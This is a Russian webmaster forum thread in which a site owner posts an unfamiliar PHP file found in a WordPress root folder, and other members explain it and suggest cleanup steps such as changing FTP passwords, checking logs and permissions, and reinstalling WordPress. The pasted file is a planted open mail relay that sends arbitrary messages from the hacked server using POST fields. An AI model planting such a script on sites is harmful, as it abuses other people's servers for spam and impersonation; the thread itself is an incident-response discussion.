Форум Сайтостроение Безопасность

Появились новые файлы в корневой папке WP

12
S@shka
На сайте с 27.09.2009
Offline
157
S@shka
1160

Нашел несколько файлов с таким содержанием, что это? 

<?php

$to      = stripslashes($_POST["to_address"]);

$BCC      = stripslashes($_POST["BCC"]);

$subject = stripslashes($_POST["subject"]);

$message = stripslashes($_POST["body"]);

$from_address = stripslashes($_POST["from_address"]);

$from_name = stripslashes($_POST["from_name"]); 

  

   



$header = "MIME-Version: 1.0\r\n";

$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";

$header .=  "From: $from_name <$from_address>\r\n";

$header .= "Bcc: $BCC\r\n";

$header .=  "Reply-To: $from_name <$from_address>\r\n";

$header .= "Subject: {$subject}\r\n";

$header .= "X-Mailer: PHP/".phpversion()."\r\n";       



$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));



if($result)

{

echo 'good';

}

else

{

    echo 'error : '.$result;

}

?>
[Удален]
#1

кто-то шлёт письма от вашего имени

S@shka
На сайте с 27.09.2009
Offline
157
S@shka
#2

хм, интересно. сайты совсем недавно созданы. первый рас с вирусами встречаюсь.

[Удален]
#3

S@shka, бывает. Смените пассы на фтп, проанализируейте ftp: посмотрите логи

S@shka
На сайте с 27.09.2009
Offline
157
S@shka
#4

Пароли мягко говоря хорошие стоят, будем лечить комп.

[Удален]
#5

S@shka, да, пройдитесь по компку, и посмотрите логи хоста. школо-хакеры, обычно получив доступ, чувствуют себя кул-хацкерами и не чистят логи. Поэтому обязательно изучите их или попросите хостера, если был зафиксирован вход на ftp со сторонних IP, то беда

Сертификация с прокторингом становится «Играем в доктора»: неправильное Вышел новый SiteAnalyzer с
Mutabors
На сайте с 17.09.2012
Offline
127
Mutabors
#6

Проверьте права доступа на корень, наверняка у Вас 777 стоит, ну и ниже само собой...

Переустановите вордпресс, полностью прибив имеющийся дистрибутив в начале (не забудьте забекапить файлы из какталого довнлоад)

Проверьте содержимое файла .htaccess

Пароли смените все равно.

Если после всего этого, через какоето время снова "что то" появиться, то либо используете левый плагин или тему, либо через хостера (что маловероятно, но иногда имеет место быть)

Самый продвинутый и надежный SSD хостинг рунета с изоляцией сайтов по 115 руб! (http://beget.ru/?id=332651) Контекстная реклама и продажи. Конкурентные и серые темы. Дорого! Не трать время на рутину! Ее сделают за копейки! (http://www.work-zilla.com?ref=143498)
В Яндекс.Вебмастере появилась возможность О чем нужно помнить 13 Excel-граблей, на которые
S@shka
На сайте с 27.09.2009
Offline
157
S@shka
#7
Mutabors:
Проверьте права доступа на корень, наверняка у Вас 777 стоит, ну и ниже само собой...
Переустановите вордпресс, полностью прибив имеющийся дистрибутив в начале (не забудьте забекапить файлы из какталого довнлоад)
Проверьте содержимое файла .htaccess
Пароли смените все равно.

Если после всего этого, через какоето время снова "что то" появиться, то либо используете левый плагин или тему, либо через хостера (что маловероятно, но иногда имеет место быть)

Спасибо, сейчас действительно проще сайты переустановить, т.к. там нет ничего. У хостера этого 3 аккаунта держу, на других чисто.

S@shka
На сайте с 27.09.2009
Offline
157
S@shka
#8

Еще и мобильный редирект нашелся :(

exarh
На сайте с 28.03.2010
Offline
503
exarh
#9
S@shka:
Еще и мобильный редирект нашелся :(

Посмотрите может вам еще и помогли сайт делать и добавили страничек.

Монетизируй (https://publishers.propellerads.com/#/pub/auth/signUp?ref_id=tnE) свой сайт с выгодой
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#10
S@shka:
пасибо, сейчас действительно проще сайты переустановить, т.к. там нет ничего

Вместе с темами с помоек? Будет тоже самое. :) Инфа 100%.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий